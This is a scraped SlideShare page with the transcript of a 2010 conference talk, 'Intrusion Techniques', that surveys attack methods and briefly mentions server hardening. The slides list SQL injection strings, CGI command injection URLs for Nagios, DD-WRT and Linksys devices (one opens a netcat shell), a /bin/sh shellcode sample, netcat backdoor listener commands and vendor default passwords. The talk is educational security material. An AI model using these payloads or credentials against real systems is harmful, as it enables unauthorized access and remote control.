Your SlideShare is downloading. ×
0
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Intrusion Techniques
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Intrusion Techniques

3,434

Published on

Serão demonstradas diversas técnicas de ataque, tais como: Injeções de codigos,brute force, backdoors, root kits, exploits e várias outras maneiras para acessar e se manter indevidamente a …

Serão demonstradas diversas técnicas de ataque, tais como: Injeções de codigos,brute force, backdoors, root kits, exploits e várias outras maneiras para acessar e se manter indevidamente a servidores,em contra-partida são discutidas melhores praticas para se
evitar os tipos de ataques citados. (Palestra realizada no 3º Festival de Software livre em belo horizonte - FSLBH)

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,434
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
108
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Intrusion Techniques DcLabs Hacking Tour 2010 Ewerson Guimarães (Crash) Rener Silva (Gr1nch)
  • 2. Agenda FingerPrint Web-Bugs Backdoors MetaSploit Brute Force IIS SemiColon ShellCode Man-in-the-Middle Exploits Sniffers Scanners/Fuzzers
  • 3. FingerPrint Grab informations about a target host. Ex: It's used to identify Operational System and/or Services(daemon) version number by TCP/IP response's unique characteristics. The best tool for discovery operating systems, services, devices and others: NMAP (Network Mapper) Basic commands: nmap host (Basic) nmap –sV host (Service Versions) nmap –P0 host ( ICMP ECHO-REPLY Ignore) nmap –O host (Try to grab O.S version) nmap –f host (Firewall/IDS/IPS Evasion)
  • 4. Passive - FingerPrint • TTL - What the operating system sets the Time To Live on the outbound packet • Window Size - What the operating system sets the Window Size at. • DF - Does the operating system set the Don't Fragment bit. • TOS - Does the operating system set the Type of Service, and if so, at what.
  • 5. FingerPrint Matrix:
  • 6. FingerPrint U. Bourne
  • 7. Web Vulnerability These vulnerabilities are initially explored through malicious browser requests compromising the target in a matter of minutes SQL-Injection Cross Site (XSS) Cross Site Request Forgery (CSRF) CGI’s Command Injection PHP-Injection
  • 8. Web Vulnerability SQL-Injection It occurs when the attacker can insert a series of SQL statements within a 'query' by manipulating the data entry application. SELECT campos FROM tabela WHERE campo = 'test@test.com'; Inject string: some' OR 'x'='x SELECT fields FROM table WHERE field = ‘some' OR 'x'='x'; admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a ' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a " or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="a
  • 9. SQL-Injection
  • 10. Web Vulnerability CGI Command Injection It occurs when the attacker insert a series of commands exploiting vulnerable CGI scripts Nagios: https://www.xxx.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+ %24PATH DD-WRT http://www.xxx.com/cgi-bin/;nc$IFS-l$IFS-p$IFS5555$IFS-e$IFS/bin/sh Linksys –Wireless /setup.cgi? ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60& ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=p ing_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1 .1.1;/bin/ps aux&message= HTTP/1.1
  • 11. ShellCode Introduction #include <stdio.h> main(){ char *comando[2]; comando[0]="/bin/sh"; comando[1]=NULL; execve(comando[0],comando,NULL); :} char shellcode[] = "xebx1fx5ex89x76x0ax31xc0x88x46x09x89x46x0exb0x0bx89" "xf3x8dx4ex0ax8dx56x0excdx80x31xdbx89xd8x40xcdx80xe8" "xdcxffxffxff/bin/sh";
  • 12. Exploits Kinds of Exploits: Local: Usually, the objective of a local exploit is to elevate user's privileges on the machine as close as possible to root (uid=0) or administrator. They are written to exploit kernel bugs or suid binaries Remote: It works over a network connection and exploit the vulnerable target without any prior access to it. www.securityfocus.com www.milw0rm.com www.secunia.com www.exploit-db.com 0Days –It works usually an unpublished exploit from a brand new found vulnerability. You can buy! $$$$$
  • 13. Backdoors/RootKits Used to maintain access to the system We can Netcat use for this purpose nc –vv –l –p 5555 nc –vv –l –p 5555 –e /bin/bash nc <ip> <port> RootKits The main purpose of a rootkit is to hide the attacker's presence replacing vital system binaries from target's system Example: Hide files (with match strings) Run command when match strings Hide processes Hide open ports, and others.
  • 14. Default/Weak passwords Default passwords are set by its manufacturers/developers and were not changed after the installation/configuration. As supplied by the system vendor and meant to be changed at installation time (Nobody do this shit) Ex: Sw 3Com: User: security Pass: security FireBird: User: sysdba Pass: masterkey Weak: Passwords that are easily guessed or in a keyboard sequential Ex: 123456 love House´s phone Birthday Etc...
  • 15. Brute Force It consists in using random combinations of characters/numbers and symbols, wordlists and/or string generators to crack a password Ex: John the Ripper Hydra SSH Brute Force
  • 16. Brute Force DirBuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers
  • 17. Scanners/Fuzzers There are 2 types of scanners: Specific which are written for a specific vulnerability (BSQLHacker, SQLMAP) and Generic which are written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate the potential target/vulnerabilities Saint W3af Nexpose Community
  • 18. Scanners/Fuzzers Nexpose Community
  • 19. Scanners/Fuzzers W3af
  • 20. Scanners/Fuzzers Saint
  • 21. Sniffers Sniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and cool infos ) WhireShark -
  • 22. DoS Denial of Service, consist of attempts to prevent valid users from using a particular feature or simply drop it SYN FLOOD UDP Packet Storm DDoS Smurf Attack
  • 23. MetaSploit
  • 24. MetaSploit
  • 25. IIS SemiColon Secure it? Wtf?
  • 26. Man-in-the-Middle
  • 27. Hardening your server HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system. http://hntool.net
  • 28. UAI? crash@dclabs.com.br irc.freenode.net #dclabs gr1nch@dclabs.com.br #securityguys

×